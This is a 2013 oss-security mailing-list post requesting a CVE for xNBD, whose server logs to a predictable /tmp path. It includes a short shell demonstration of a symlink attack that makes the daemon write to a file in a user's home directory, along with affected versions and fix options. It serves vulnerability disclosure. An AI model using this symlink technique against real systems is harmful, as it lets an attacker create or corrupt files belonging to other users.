![]() |
|
Date: Wed, 06 Feb 2013 17:48:59 +0100
From: Sebastian Pipping <sebastian@...ping.org>
To: oss-security@...ts.openwall.com
Subject: CVE request: Insecure default log file path in xNBD
Hello oss-security!
Target software
===============
xNBD upstream
https://bitbucket.org/hirofuchi/xnbd
Official Debian packages
http://packages.debian.org/sid/xnbd-server
Description
===========
xnbd-server (and xnbd-wrapper in some releases) use /tmp/xnbd.log
for logging when parameter --daemonize (and no --logpath FILE) is given.
The file is opened using flags O_WRONLY | O_CREAT | O_APPEND so there
is a vulnerability against symlinks attacks.
Demonstration
=============
Here is an exploitation example:
$ ln -s "${HOME}"/ATTACK_TARGET /tmp/xnbd.log
$ touch DISK
$ truncate --size=$((100*1024**2)) DISK
$ /usr/sbin/xnbd-server --daemonize --target DISK
xnbd-server(12462) msg: daemonize enabled
xnbd-server(12462) msg: cmd target mode
xnbd-server(12462) msg: disk DISK size 104857600 B (100 MB)
xnbd-server(12462) msg: xnbd master initialization done
xnbd-server(12462) msg: logfile /tmp/xnbd.log
$ ls -l ~/ATTACK_TARGET
-rw------- 1 user123 user123 653 Feb 1 16:41 \
/home/user123/ATTACK_TARGET
Affected versions
=================
The latest code in the upstream Mercurial repository is not affected
since it does not use logging to /tmp/xnbd.log (or any default
location) any more.
----------------------------------------------------------------------
Version Status
----------------------------------------------------------------------
0.0.x not analyzed
0.1.0-pre VULNERABLE (xnbd-server only)
0.1.0-pre-hg20-e75b93a47722-2 VULNERABLE (xnbd-server and -wrapper)
Mercurial tip not vulnerable
----------------------------------------------------------------------
Options for a fix
=================
a) Use syslog with --daemonize and no default file location in general
(i.e. what upstream did)
b) Use /var/log/xnbd-server.log and /var/log/xnbd-wrapper.log
for the hard-coded defaults
c) Replace flag O_APPEND by O_EXCL (secure but reducing functionality)
The attached patch applies approach (b) to version
0.1.0-pre-hg20-e75b93a47722.
Best,
Sebastian
View attachment "xnbd-0.1.0-pre-hg20-e75b93a47722-insecure-logging-location.patch" of type "text/x-patch" (6162 bytes)
Powered by blists - more mailing lists
Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.